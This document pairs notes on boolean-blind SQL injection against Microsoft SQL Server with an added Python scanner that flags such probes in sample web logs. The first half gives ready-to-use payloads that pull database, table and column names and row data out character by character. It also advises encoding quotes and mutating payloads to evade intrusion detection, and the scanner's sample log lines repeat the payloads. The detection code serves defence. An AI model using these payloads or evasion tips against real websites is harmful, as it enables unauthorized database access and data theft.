Three key MSSQL system tables:
1. master.dbo.sysdatabases: this table lives in the master database
Key columns: name: database name; dbid: database id (dbid 1 through 5 are system databases)
2. sysobjects: this table exists in every database
Key columns: name: object name; id: object id; uid: user id of the owner; status: object status; xtype: object type
xtype="U" //user table, xtype="X" //extended stored procedure, xtype="S" //system table
3. syscolumns: this table exists in every database
Key columns: name: column name; id: id of the table the column belongs to; colid: column id
Guessing the database name:
First guess the dbid:
and (select count(*) from master.dbo.sysdatabases where dbid=5)=1
Guess the database name from its dbid; start with the length:
and (select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=12)=1
Then guess it one character at a time:
and (select count(*) from master.dbo.sysdatabases where dbid=5 and ascii(substring(name,1,1))>90)=1
Guessing table names (assuming the database name has already been found to be database):
You can first check whether an admin table exists:
and (select count(*) from database.dbo.sysobjects where xtype='u' and name like '%admin%')=1
Guess the first table; length first:
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and len(name)=9)=1
Guess the first table name one character at a time:
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))>90)=1
Guess the second table name (assuming the first is table1):
and (select count(*) from database.dbo.sysobjects where name in (select top 1 name from database.dbo.sysobjects where xtype='u' and name not in ('table1')) and ascii(substring(name,1,1))>90)=1
Guessing column names (assuming the table name has already been found to be table):
Guess the first column:
and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table')) and ascii(substring(name,1,1))>90)=1
Guess the second column (assuming the first is column1):
and (select count(*) from database.dbo.syscolumns where name in (select top 1 name from database.dbo.syscolumns where id=object_id('database.dbo.table') and name not in ('column1')) and ascii(substring(name,1,1))>90)=1
Guessing data (assuming the column to guess is name):
and (select count(*) from database.dbo.table where name in (select top 1 name from database.dbo.table) and ascii(substring(name,1,1))>90)=1
If ' is filtered, remember to encode; when an IDS is present, remember to mutate the payload; before guessing data, remember to guess its length first!
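An added, defender-side example (not part of the original notes): a small Python scanner that runs over constructed web-server access-log lines and flags the boolean-blind probes described above by their signature, namely a count(*) subquery against sysdatabases, sysobjects or syscolumns, with len() or ascii(substring()) marking the length and character-by-character stages. The log lines, client addresses and the database name shop are constructed for the example; the decoder also unwraps repeated URL encoding, since the notes point out that payloads get encoded to slip past filters.

```python
import re
import urllib.parse

# Constructed sample access-log lines (not real traffic). The query strings are URL-encoded
# the way a browser or injection tool would send them.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /news.asp?id=12 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20master.dbo.sysdatabases%20where%20dbid=5)=1 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20shop.dbo.sysobjects%20where%20xtype=%27u%27%20and%20name%20like%20%27%25admin%25%27)=1 HTTP/1.1" 200',
    '10.0.0.5 - - "GET /news.asp?id=12%20and%20(select%20count(*)%20from%20shop.dbo.syscolumns%20where%20name%20in%20(select%20top%201%20name%20from%20shop.dbo.syscolumns%20where%20id=object_id(%27shop.dbo.users%27))%20and%20ascii(substring(name,1,1))%3E90)=1 HTTP/1.1" 200',
    '10.0.0.9 - - "GET /search.asp?q=sysobjects+tutorial HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
# A count(*) subquery whose FROM clause ends in one of the three system tables (any db/schema prefix).
PROBE_RE = re.compile(r"select\s+count\(\*\)\s+from\s+[\w.\[\]]*?(sysdatabases|sysobjects|syscolumns)\b")
CHAR_RE = re.compile(r"ascii\s*\(\s*substring\s*\(")
LEN_RE = re.compile(r"\blen\s*\(")


def normalize(raw: str, rounds: int = 3) -> str:
    """URL-decode up to `rounds` times (catches double encoding), lowercase, collapse whitespace."""
    s = raw
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\s+", " ", s.lower())


def classify(line: str):
    """Return (system_table, stage) if the request is a system-table enumeration probe, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = normalize(m.group(1))
    probe = PROBE_RE.search(query)
    if not probe:  # a bare mention of 'sysobjects' (e.g. a search term) is not a probe
        return None
    if CHAR_RE.search(query):
        stage = "char-by-char"
    elif LEN_RE.search(query):
        stage = "length"
    else:
        stage = "existence"
    return probe.group(1), stage


def scan(lines):
    """Yield (line_index, system_table, stage) for every flagged request."""
    hits = []
    for i, line in enumerate(lines):
        hit = classify(line)
        if hit:
            hits.append((i, hit[0], hit[1]))
    return hits
```

A run of "length" followed by many "char-by-char" hits against the same table from one client is the enumeration sequence the notes describe, which is a stronger alert than any single request.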